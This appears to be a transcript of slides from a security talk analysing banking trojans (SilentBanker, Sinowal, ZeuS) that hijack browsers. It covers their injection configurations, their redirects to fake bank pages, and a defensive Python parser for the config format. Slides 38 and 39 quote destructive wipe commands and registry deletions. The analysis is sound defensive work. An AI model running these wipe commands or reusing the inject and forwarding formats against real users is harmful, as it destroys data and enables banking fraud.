4. Definition
“Browser hijacking is the modification of a web browser’s settings by malicious code. The term ‘hijacking’ is used as the changes are performed without the user’s permission” (Wikipedia)
Additionally, the malicious code can modify the HTML rendered in the browser in order to lure the user
7. SilentBanker
Date: 2007
Method: Browser Helper Object
Technique: Real time HTML injection and HTML forwarding
Infection: drive-by exploits
Misc: more than 75 mutations
12. SilentBanker: Injection Configuration
GET X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442

Configuration fields:
pok   Action (insert, delete, replace, subreq, grab)
qas   Target URL
njd   Begin replacement token
dfr   Number of characters in njd -1
xzn   End replacement token
xzq   Number of characters in xzn -1
rek   HTML code injected
req   Number of characters in rek -1

Actions:
insert   insert injected HTML code between tokens
delete   delete HTML code in xzn
replace  replace HTML code in xzn
subreq   substitute xzn with rek
grab     extract field in xzn

Example entry:
[jhw18]
pok=insert
qas=passport.yandex.ru/passport
njd=3ECFE0F0EEEBFC3A3C28
dfr=9
xzn=3C2367653E69
xzq=5
rek=202020203C676520696E797674612122676263223E0D0A202020203223ECFEBE0F2E5E6EDFBE920EFE0F0EEEBFC3A3C2367713E0D0A202020203C6771206A767167752122292431222070796E666621227661636867223E0D0A202020203C766163686720676C63722122636E66666A6265712220616E7A722122636E66666…
req=331
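An added analyst-side example (not code from the presentation or from the malware) that parses a configuration in the format above, hex-decodes the njd/xzn/rek tokens, checks the "number of characters -1" counters, and previews where an insert entry lands. The section name, target URL and tokens in SAMPLE_CFG are constructed for the demo.

```python
import binascii
import re
ACTIONS = {"insert", "delete", "replace", "subreq", "grab"}
LENGTH_FIELDS = {"njd": "dfr", "xzn": "xzq", "rek": "req"}  # token -> (len - 1) field
# Constructed sample entry (not from a real sample): adds an input cell between "</td>" (njd) and "</tr>" (xzn).
SAMPLE_CFG = """[demo1]
pok=insert
qas=bank.example/login
njd=3C2F74643E
dfr=4
xzn=3C2F74723E
xzq=4
rek=3C74643E3C696E70757420747970653D2274657874223E3C2F74643E
req=27
"""

def parse_config(text):
    """Split '[name]' sections of key=value lines into a dict of dicts."""
    entries, current = {}, None
    for line in filter(None, map(str.strip, text.splitlines())):
        header = re.fullmatch(r"\[(\w+)\]", line)
        if header:
            current = entries.setdefault(header.group(1), {})
            continue
        key, sep, value = line.partition("=")
        if current is None or not sep:
            raise ValueError(f"unexpected line: {line!r}")
        current[key.strip()] = value.strip()
    return entries

def decode_entry(fields):
    """Hex-decode the tokens and verify the 'number of characters -1' counters."""
    if fields.get("pok") not in ACTIONS:
        raise ValueError(f"unknown action: {fields.get('pok')!r}")
    entry = {"action": fields["pok"], "target": fields["qas"]}
    for token, length_key in LENGTH_FIELDS.items():
        raw = binascii.unhexlify(fields[token])
        if int(fields[length_key]) != len(raw) - 1:
            raise ValueError(f"{length_key} does not match the length of {token}")
        entry[token] = raw
    return entry

def preview_insert(page, entry):
    """Show what an 'insert' entry does: rek lands between njd and xzn."""
    begin = page.find(entry["njd"])
    end = page.find(entry["xzn"], begin + len(entry["njd"])) if begin >= 0 else -1
    if entry["action"] != "insert" or end < 0:
        return page  # other actions, or tokens missing/out of order: unchanged
    return page[:end] + entry["rek"] + page[end:]
```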
16. Sinowal/Anserin/Torpig
Date: 2005
Method: Code Injection
Technique: Real time HTML injection and HTML forwarding
Infection: drive-by exploits and email
Misc: infects Master Boot Record (MBR) to be stealth
17. Sinowal: Injection
Sinowal does not have a configuration file with details about all the injections
Each time the user connects to a specific site, Sinowal asks its injection server for instructions
18. Sinowal: Injection Example
GET host/Key/EncryptedData
GET host/EFAAC5AEB85FF1D1/MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1
Callouts on the slide: “I want the answer”, “Tell me the fake page path”, “This is the targeted encrypted brand”
19. Sinowal: Injection Example
Step 3: The injection server looks for the targeted brand:
UK   online*.lloydstsb.*         /miheld.ibc                     {www}  /uk/lloyds/lloyds.php                 2 0 4
USA  onlineid.bankofamerica.com  /cgi-bin/sso.login.controller*  {www}  /usa/bofa_pers/sso.login.php          2 0 3
ES   www*.bancopopular.es        /Bpemotor                       {www}  /spain/bancopopular/bancopopular.php  2 0 2
20. Sinowal: Injection Example
Step 4: the injection server answers
www*.bancopopular.es /Bpemotor  /spain/bancopopular/bancopopular.php  2 0 5 1
Callouts on the slide:
www*.bancopopular.es /Bpemotor: This is the real URL
/spain/bancopopular/bancopopular.php: This is the fake page path
2: You need a GET
0: Number of injection attempts
5: Number of visits
1: Injection enabled
22. Wnspoem/PRG/ZeuS/Ntos
Date: 2006
Method: Code Injection
Technique: Real time HTML injection and HTML forwarding
Infection: drive-by exploits
               Version 1   Version 2      Version 3  Version 4
Directory      wnspoem     sysproc64      twain_32   lowsec
Filename       ntos.exe    oembios.exe    twext.exe  sdra64.exe
Stolen data    audio.dll   sysproc86.sys  local.ds   local.ds
Configuration  video.dll   sysproc32.sys  user.ds    user.ds
29. Wnspoem: HTTP Forwarding
Some banks use security tokens or more complex second-factor authentication than a password
In this scenario, HTML injection is avoided, and the user is forwarded to a fake webpage usually hosted in a compromised site
30. Wnspoem: HTTP Forwarding
In the configuration file:
@https://*.barclays.co.uk/*
https://*.barclays.co.uk/*
http://compromisedhost.com/img/commons/barclay/index.php
@https://*.cajasur.es/*
https://*.cajasur.es/*
http://compromisedhost.com/img/commons/cajasur/index.php
38. Kill the Operating System
It is getting more common that, just after stealing the credentials, the operating system is remotely destroyed
This action makes the analysis more difficult, since it cannot be done remotely.
The malicious code is not securely deleted from the system and can be recovered
One optimistic result is that the machine will be reformatted with a new and patched operating system.
39. Kill the Operating System
Nethell:
• Deletes NTDETECT.COM and ntldr
InfoStealer:
• Deletes drivers\*.sys
• Deletes some registry keys (HKLM\Microsoft\Windows NT\CurrentVersion\Winlogon: Shell = Explorer.exe)
Wnspoem:
• Deletes HKCU, HKLM\Software and HKLM\System
Glacial Dracon:
• del /A:S /Q /F C:\*.*
• del /S /Q %SYSTEMROOT% %PROGRAMFILES%
41. Summary
Browser hijacking is actively used in fraud schemes
Targeted brands are all around the world
Currently, only Microsoft Windows users are affected (Internet Explorer and Firefox)
Be suspicious if your browser is asking for too much information
Be more suspicious if your computer stops working just after your browser asks for too much information ☺